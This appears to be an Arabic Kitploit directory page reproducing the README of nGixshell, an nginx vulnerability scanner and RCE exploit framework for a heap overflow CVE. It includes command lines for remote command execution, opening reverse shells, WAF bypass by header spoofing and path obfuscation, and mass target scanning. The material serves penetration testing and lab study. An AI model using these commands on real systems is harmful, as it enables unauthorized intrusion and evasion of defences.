Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
nGixshell — nginx ماسح CVE + إطار عمل استغلال RCE (CVE-2026-42945 + 16 أخرى) | Kitploit
أدوات/GitHubGitHub/mateusverass/ngixshell
الاستطلاعماسحات الثغرات الأمنيةأطر الاستغلالاستغلال تطبيقات الويبتجاوز WAFأمن الويباختبار الاختراقالقيادة والسيطرةتعداد النطاقات الفرعيةالفريق الأحمرتطوير الحمولات
21832منذ 3 أيامتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
mateusverass/ngixshell

nGixshell

nginx ماسح CVE + إطار عمل استغلال RCE (CVE-2026-42945 + 16 أخرى)

عرض المستودع
nGixShell

Python CVEs Zero deps License


nGixShell هو ماسح ثغرات nginx وإطار عمل لاستغلال RCE. يتضمن إثبات مفهوم لـ CVE-2026-42945 (CVSS 3.1 8.1 HIGH وفقًا لـ F5/NVD) — وهو تجاوز سعة المخزن المؤقت في الكومة (heap buffer overflow) في ngx_http_rewrite_module — بالإضافة إلى ماسح يغطي 64 ثغرة nginx مع فحوصات HTTP آلية، وبصمة الإصدار، وكشف/تجاوز WAF، وتدقيق أمن الويب، وإنشاء التقارير.

بدون أي اعتماديات خارجية. مكتبة Python 3 القياسية فقط.

متطلبات الاستغلال (اقرأ أولًا). لا يعمل --cmd / --shell إلا عندما تكون جميع الشروط التالية صحيحة: الهدف x86_64، وإعداد rewrite+set القابل للاستغلال موجود، وASLR معطّل، وعناوين الكومة/libc قد تم معايرتها لذلك الإصدار بالتحديد (calibrate.py → --build-file). راجع متطلبات الاستغلال. الماسح نفسه لا يتطلب أي من ذلك.


البدء السريع

# Spin up the vulnerable lab (builds nginx from source, ASLR disabled)
docker compose -f env/docker-compose.yml up -d --build

# Auto mode — fingerprint + CVE scan + web audit (works on any arch)
python3 ngixshell.py 127.0.0.1:19321

# RCE — calibrate, restart the worker for a clean heap, then exploit
W=$(pgrep -f 'nginx: worker' | head -1)
sudo python3 calibrate.py 127.0.0.1 19321 "$W" --spray-path /spray \
    --spray-mode full --json -o profile.json
docker compose -f env/docker-compose.yml restart nginx-vuln
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id > /tmp/rce.txt' \
    --build-file profile.json
docker compose -f env/docker-compose.yml exec nginx-vuln cat /tmp/rce.txt

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell --build-file profile.json

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file (one report per target)
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

لا حاجة لأي أعلام — توجيه الأداة نحو هدف يشغّل كل شيء تلقائيًا.
يتم الكشف التلقائي عن TLS. يتم أخذ بصمة nginx حتى مع server_tokens off.

system() لا يلتقط stdout: --cmd 'id' يُنفَّذ لكنه لا يطبع أي شيء.
استخدم أمرًا له تأثير جانبي قابل للملاحظة وأكّده باستخدام --verify-url http://target/pwned (HTTP 200 = مؤكد).


الاستخدام

python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

الأوضاع

العلمالوصف
(لا شيء)تلقائي — بصمة + فحص CVE + تدقيق الويب
--cmd 'CMD'تنفيذ أمر عبر CVE-2026-42945 RCE
--cmd-file FILEتنفيذ أوامر من ملف (مدمجة بـ ;)
--shellفتح reverse shell
--shell-type TYPEالحمولة: bash python perl php nc powershell (الافتراضي: python)
--upgrade-shellإرسال ترقية PTY تلقائيًا بعد اتصال الـ shell
--verify-url URLبعد اكتشاف انهيار، جلب URL لتأكيد تنفيذ الأمر (200 = مؤكد)
--subdomain-scan DOMAINالبحث عن nginx قابل للاستغلال في النطاقات الفرعية
--cve CVE-IDاختبار ثغرة محددة واحدة
--list-cvesطباعة جميع الثغرات الـ 64 مع CVSS ومعلومات الفحص
--list-candidatesطباعة مرشحات عناوين الكومة
--dry-runبصمة + فحص فقط، بدون استغلال
--target-file FILEفحص عدة مضيفين من ملف

ضبط الاستغلال

العلمالوصف
--build-file FILEموصى به. ملف تعريف معايرة JSON من calibrate.py --json -o FILE
--offsets SPECإزاحات كومة سداسية عشرية مفصولة بفواصل من calibrate.py (مثل 0x5a427,0x60e67)
--heap-base HEX / --libc-base HEX / --system-addr HEXتجاوزات يدوية للعناوين
--build KEYملف تعريف مدمج (فقط مرجع مختبر DepthFirst مضمّن)
--rewrite-path PATHموقع rewrite القابل للاستغلال (الافتراضي /api)
--spray-path PATHموقع مدعوم بـ proxy_pass يُستخدم لرش جسم POST (الافتراضي /upload؛ المختبر المضمّن يستخدم /spray)
--spray-mode partial|fullpartial: جسم قصير + Content-Length كبير (المختبر المضمّن)؛ full: جسم كامل + X-Delay (مختبر DepthFirst)
--pad-a N / --pad-plus Nحشو مسار التشغيل قبل تشغيل + (الافتراضي 349 / 969، من PoC المورّد)
--continue-on-crashالاستمرار في تجربة مرشحات الكومة المتبقية بعد انهيار غير مؤكد
--tries N / --spray N / --body-len Nمحاولات التشغيل لكل مرشح / اتصالات الرش / حجم جسم الرش

كشف WAF وتجاوزه

العلمالوصف
--waf-detectكشف WAF قبل الفحص
--waf-bypassتفعيل جميع تقنيات التجاوز (يشغّل الكشف أيضًا)
--waf-ip IPانتحال هذا IP في ترويسات التجاوز (الافتراضي: RFC1918 عشوائي)

تقنيات التجاوز (جميعها نشطة عند تعيين --waf-bypass):

التقنيةالتفاصيل
انتحال IPX-Forwarded-For، X-Real-IP، X-Originating-IP، True-Client-IP، X-Remote-IP، X-Client-IP
تدوير UA11 User-Agent حقيقي لمتصفحات/بوتات، عشوائي لكل طلب
تشويش المسارشرطة مزدوجة، حشو /./، ترميز نسبي، تنويع حالة الأحرف
خلط حالة الترويساتعشوائية حالة أحرف أسماء الترويسات لكسر مطابقة أنماط WAF

جدران WAF المكتشفة: Cloudflare، AWS WAF، Akamai، Imperva/Incapsula، ModSecurity، F5 BIG-IP ASM، Sucuri، Barracuda، NAXSI، Fastly، Wordfence

تدقيق الويب

يعمل تلقائيًا في وضع الفحص. يمكن تخطي جميع الوحدات بشكل فردي.

العلمالوصف
--skip-headersتخطي تدقيق ترويسات أمان HTTP
--skip-pathsتخطي اكتشاف المسارات/الملفات
--skip-vhostsتخطي تعداد المضيفات الافتراضية
--skip-tlsتخطي تدقيق بروتوكول TLS
--path-wordlist FILEمسارات إضافية للفحص (واحد لكل سطر)
  • تدقيق الترويسات — HSTS، CSP، X-Frame-Options، X-Content-Type-Options، Referrer-Policy، Permissions-Policy، ترويسات تسريب الإصدار
  • اكتشاف المسارات — أكثر من 50 مسارًا؛ فحص إشاري يزيل الإيجابيات الكاذبة من قواعد 403/301 الشاملة
  • تعداد المضيفات الافتراضية — يتطلب اختلاف الحالة AND الجسم لتجنب الإيجابيات الكاذبة للحظر الافتراضي
  • تدقيق TLS — اختبار دعم TLS 1.0–1.3، انتهاء صلاحية الشهادة، وكشف التوقيع الذاتي
  • stub_status — تحليل مقاييس الاتصالات النشطة من /nginx_status إذا كان مكشوفًا

الاتصال

العلمالوصف
--port PORTتجاوز المنفذ
--tlsفرض TLS (يُكتشف تلقائيًا افتراضيًا)
--proxy URLبروكسي: http://، https://، socks5://

HTTP

العلمالوصف
--user-agent UAUser-Agent مخصص
--auth USER:PASSمصادقة HTTP Basic
--cookie VALUEترويسة Cookie
--header NAME:VALUEترويسة إضافية (قابلة للتكرار)

المعدل / التوقيت

العلمالوصف
--rate-limit RPSالحد الأقصى للطلبات في الثانية
--jitter MSتأخير عشوائي 0–MS مللي ثانية بين الطلبات
--retry Nإعادة محاولة الفحوصات غير الحاسمة (الافتراضي: 1)
--timeout-multiplier Xقياس جميع المهلات (الافتراضي: 1.0)

الإخراج

العلمالوصف
--output FILEكتابة السجل إلى FILE
--jsonطباعة ملخص JSON في النهاية (متعدد الأهداف: {"targets": [...]})
--html-report [FILE]إنشاء تقرير HTML (ملف واحد لكل هدف في وضع تعدد الأهداف)
--verboseإخراج التصحيح

رموز الخروج: 0 — لا نتائج / تم التحقق من الاستغلال؛ 1 — توجد نتائج، لا انهيار، أو خطأ في التنفيذ. مخصص لبوابة CI. --cmd بدون --verify-url يعيد 0 عند اكتشاف انهيار العامل، وهو ما يثبت فقط أن التجاوز وصل إلى مؤشر تنظيف pool — وليس أن الكود نُفِّذ.


تغطية الثغرات

تنزيل الأداة